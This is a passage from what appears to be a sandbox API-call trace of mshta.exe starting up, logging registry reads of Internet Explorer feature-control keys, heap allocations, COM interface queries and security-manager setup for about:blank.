nDefault=50) returned 0x32 [0222.908] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x41e718, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.908] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x41e920, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0222.908] GetCurrentProcess () returned 0xffffffff [0222.908] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x41eb28, nSize=0x104 | out: lpBaseName="mshta.exe") returned 0x9 [0222.908] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0222.908] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x493368 [0222.909] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0222.909] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x41e704, pvData=0x41e710, pcbData=0x41e70c*=0x4 | out: pdwType=0x41e704*=0x0, pvData=0x41e710, pcbData=0x41e70c*=0x4) returned 0x2 [0222.909] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41e67c | out: phkResult=0x41e67c*=0x140) returned 0x0 [0222.909] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41e680 | out: phkResult=0x41e680*=0x13c) returned 0x0 [0222.909] RegOpenKeyExW (in: hKey=0x13c, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x41e63c | out: phkResult=0x41e63c*=0x0) returned 0x2 [0222.909] RegOpenKeyExW (in: hKey=0x140, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x41e63c | out: phkResult=0x41e63c*=0x0) returned 0x2 [0222.909] RegCloseKey (hKey=0x0) returned 0x6 [0222.909] RegCloseKey (hKey=0x0) returned 0x6 [0222.909] RegCloseKey (hKey=0x140) returned 0x0 [0222.909] RegCloseKey (hKey=0x13c) returned 0x0 [0222.909] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x97c) returned 0x4a1938 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x480) returned 0x4a22c0 [0222.910] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.910] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.910] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.910] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4a1518 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4a2748 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4a27a0 [0222.910] GetCurrentThreadId () returned 0x390 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49deb8 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2c) returned 0x48d6c8 [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x80) returned 0x4a27f8 [0222.910] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc14f [0222.910] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x493388 [0222.994] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0222.995] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x74478cd4, dwReserved=0x0 | out: ppSM=0x74478cd4*=0x4a2880) returned 0x0 [0222.998] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x64) returned 0x4a2e50 [0223.052] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4a2ec0 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x48d020 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4933a8 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489150 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x4891a0 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4a2f18 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x64) returned 0x4a2f80 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x4891f0 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4a2ff0 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xec) returned 0x4a3258 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489240 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489290 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x4892e0 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4a3350 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x60) returned 0x4a33b8 [0223.053] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489330 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x489380 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x90) returned 0x4a3420 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x140) returned 0x4a34b8 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x8) returned 0x49b760 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x48d050 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x4933c8 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xd0) returned 0x49bf98 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x38) returned 0x49a2e0 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x4a3600 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x148) returned 0x4a3730 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x4a3880 [0223.054] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x4933e8 [0223.054] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41ea2c | out: ppURI=0x41ea2c*=0x49b9a4) returned 0x0 [0223.054] IUri:GetPropertyDWORD (in: This=0x49b9a4, uriProp=0x11, pdwProperty=0x41ea14, dwFlags=0x0 | out: pdwProperty=0x41ea14*=0x11) returned 0x0 [0223.054] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x4a206c, dwReserved=0x0 | out: ppSM=0x4a206c*=0x4a38e8) returned 0x0 [0223.070] IInternetSecurityManager:SetSecuritySite (This=0x4a38e8, pSite=0x4a2074) returned 0x0 [0223.070] IUnknown:AddRef (This=0x4a2074) returned 0x28 [0223.070] IUnknown:QueryInterface (in: This=0x4a2074, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x41e9e4 | out: ppvObject=0x41e9e4*=0x4a2078) returned 0x0 [0223.070] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4a3910 | out: ppvObject=0x4a3910*=0x0) returned 0x80004002 [0223.070] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4a390c | out: ppvObject=0x4a390c*=0x0) returned 0x80004002 [0223.070] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4a3908 | out: ppvObject=0x4a3908*=0x0) returned 0x80004002 [0223.070] IUnknown:Release (This=0x4a2078) returned 0x0 [0223.070] IInternetSecurityManager:GetSecurityId (in: This=0x4a38e8, pwszUrl="about:blank", pbSecurityId=0x41ea80, pcbSecurityId=0x41ea74*=0x200, dwReserved=0x0 | out: pbSecurityId=0x41ea80*=0x61, pcbSecurityId=0x41ea74*=0xf) returned 0x0 [0223.178] DllGetClassObject (in: rclsid=0x49f838*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x41e000*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41d6b8 | out: ppv=0x41d6b8*=0x74478c70) returned 0x0 [0223.178] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.178] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.179] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e27c | out: ppvObject=0x41e27c*=0x74478c70) returned 0x0 [0223.179] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.179] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41e43c | out: ppvObject=0x41e43c*=0x74478c7c) returned 0x0 [0223.179] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.179] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4934a8, cchResult=0xc, pcchResult=0x41e484, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x41e484*=0xc) returned 0x0 [0223.179] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4668 [0223.179] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.179] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4668 | out: hHeap=0x470000) returned 1 [0223.179] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.179] DllGetClassObject (in: rclsid=0x49f838*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e350 | out: ppv=0x41e350*=0x74478c70) returned 0x0 [0223.179] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41e43c | out: ppvObject=0x41e43c*=0x74478c7c) returned 0x0 [0223.179] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.179] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4934a8, cchResult=0xc, pcchResult=0x41e494, dwReserved=0x0 | out: pwzResult="", pcchResult=0x41e494*=0x0) returned 0x800c0011 [0223.179] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.180] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.180] IUnknown:Release (This=0x49b9a4) returned 0x2 [0223.180] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf) returned 0x49df00 [0223.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49df30 [0223.180] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x41ea54, dwReserved=0x0 | out: ppSM=0x41ea54*=0x4a4030) returned 0x0 [0223.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xf) returned 0x49df78 [0223.180] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4a3f78 [0223.180] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41ec04 | out: phkResult=0x41ec04*=0x190) returned 0x0 [0223.180] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41ec08 | out: phkResult=0x41ec08*=0x198) returned 0x0 [0223.181] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x41ebc4 | out: phkResult=0x41ebc4*=0x0) returned 0x2 [0223.181] RegOpenKeyExW (in: hKey=0x190, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x41ebc4 | out: phkResult=0x41ebc4*=0x0) returned 0x2 [0223.181] RegCloseKey (hKey=0x0) returned 0x6 [0223.181] RegCloseKey (hKey=0x0) returned 0x6 [0223.181] RegCloseKey (hKey=0x190) returned 0x0 [0223.181] RegCloseKey (hKey=0x198) returned 0x0 [0223.181] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x128) returned 0x4a4098 [0223.181] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4a9480 [0223.181] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49dfc0 [0223.181] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x2000) returned 0x4a94d8 [0223.181] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4ab4e0 [0223.181] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ab4e0 | out: hHeap=0x470000) returned 1 [0223.181] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.182] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41ea48 | out: ppURI=0x41ea48*=0x49b9a4) returned 0x0 [0223.182] DllGetClassObject (in: rclsid=0x49f838*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e320 | out: ppv=0x41e320*=0x74478c70) returned 0x0 [0223.182] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41e40c | out: ppvObject=0x41e40c*=0x74478c7c) returned 0x0 [0223.182] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.182] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x4934a8, cchResult=0xc, pcchResult=0x41e454, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x41e454*=0xc) returned 0x0 [0223.182] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4a4668 [0223.182] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.182] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4668 | out: hHeap=0x470000) returned 1 [0223.182] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.182] DllGetClassObject (in: rclsid=0x49f838*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x75314430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e320 | out: ppv=0x41e320*=0x74478c70) returned 0x0 [0223.183] IUnknown:QueryInterface (in: This=0x74478c70, riid=0x7533aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41e40c | out: ppvObject=0x41e40c*=0x74478c7c) returned 0x0 [0223.183] IUnknown:Release (This=0x74478c70) returned 0x1 [0223.183] IInternetProtocolInfo:ParseUrl (in: This=0x74478c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x4934a8, cchResult=0xc, pcchResult=0x41e464, dwReserved=0x0 | out: pwzResult="", pcchResult=0x41e464*=0x0) returned 0x800c0011 [0223.183] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0223.183] IUnknown:Release (This=0x74478c7c) returned 0x1 [0223.183] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.183] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.183] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0223.183] IUnknown:Release (This=0x49b9a4) returned 0x2 [0223.184] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x2c) returned 0x48d700 [0223.184] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49dff0 [0223.184] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x5c) returned 0x4ab4e0 [0223.184] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.184] GetDeviceCaps (hdc=0xab0101eb, index=88) returned 96 [0223.184] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.184] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0223.184] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41eca0 | out: phkResult=0x41eca0*=0x194) returned 0x0 [0223.184] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41eca4 | out: phkResult=0x41eca4*=0x19c) returned 0x0 [0223.184] RegOpenKeyExW (in: hKey=0x19c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x41ec60 | out: phkResult=0x41ec60*=0x0) returned 0x2 [0223.184] RegOpenKeyExW (in: hKey=0x194, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x41ec60 | out: phkResult=0x41ec60*=0x0) returned 0x2 [0223.185] RegCloseKey (hKey=0x0) returned 0x6 [0223.185] RegCloseKey (hKey=0x0) returned 0x6 [0223.185] RegCloseKey (hKey=0x194) returned 0x0 [0223.185] RegCloseKey (hKey=0x19c) returned 0x0 [0223.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e020 [0223.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x44) returned 0x4893d0 [0223.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x5c) returned 0x4ab548 [0223.185] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76180000 [0223.185] GetProcAddress (hModule=0x76180000, lpProcName="InitializeSRWLock") returned 0x76f48456 [0223.185] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockExclusive") returned 0x76f429f1 [0223.185] GetProcAddress (hModule=0x76180000, lpProcName="AcquireSRWLockShared") returned 0x76f42560 [0223.185] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockExclusive") returned 0x76f429ab [0223.185] GetProcAddress (hModule=0x76180000, lpProcName="ReleaseSRWLockShared") returned 0x76f425a9 [0223.185] RtlInitializeConditionVariable () returned 0x4ab57c [0223.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4a42a0 [0223.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4ab5b0 [0223.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4934a8 [0223.186] IUnknown:Release (This=0x74478cb0) returned 0x1 [0223.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x28) returned 0x48d0b0 [0223.275] IUnknown_QueryService (in: punk=0x744796a4, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x4a1990 | out: ppvOut=0x4a1990*=0x0) returned 0x80004005 [0223.275] IUnknown:QueryInterface (in: This=0x744796a4, riid=0x766142d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x41f9f0 | out: ppvObject=0x41f9f0*=0x744796b8) returned 0x0 [0223.276] IServiceProvider:QueryService (in: This=0x744796b8, guidService=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7410880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x4a1990 | out: ppvObject=0x4a1990*=0x0) returned 0x80004005 [0223.276] IUnknown:Release (This=0x744796b8) returned 0x1 [0223.276] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x34) returned 0x4ab5f0 [0223.276] IInternetSecurityManager:SetSecuritySite (This=0x4a38e8, pSite=0x4a2074) returned 0x0 [0223.276] IUnknown:Release (This=0x4a2074) returned 0x0 [0223.276] IUnknown:AddRef (This=0x4a2074) returned 0x28 [0223.276] IUnknown:QueryInterface (in: This=0x4a2074, riid=0x753261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x41fa28 | out: ppvObject=0x41fa28*=0x4a2078) returned 0x0 [0223.276] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7532f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x4a3910 | out: ppvObject=0x4a3910*=0x0) returned 0x80004002 [0223.276] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7532f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x4a390c | out: ppvObject=0x4a390c*=0x0) returned 0x80004002 [0223.276] IServiceProvider:QueryService (in: This=0x4a2078, guidService=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7531c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x4a3908 | out: ppvObject=0x4a3908*=0x744796bc) returned 0x0 [0223.276] IUnknown:Release (This=0x4a2078) returned 0x0 [0223.276] CoTaskMemAlloc (cb=0x6d) returned 0x4ab630 [0223.276] CoTaskMemAlloc (cb=0x9) returned 0x49e038 [0223.276] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x49e050 [0223.276] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ab6a8 [0223.285] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0223.285] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x489420 [0223.316] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x49e068 [0223.316] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x49e080 [0223.317] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x49b830 [0223.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4a46e0 [0223.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x49e098 [0223.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x94) returned 0x4ab700 [0223.318] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x34) returned 0x4ab7a0 [0223.318] RtlAllocateHeap 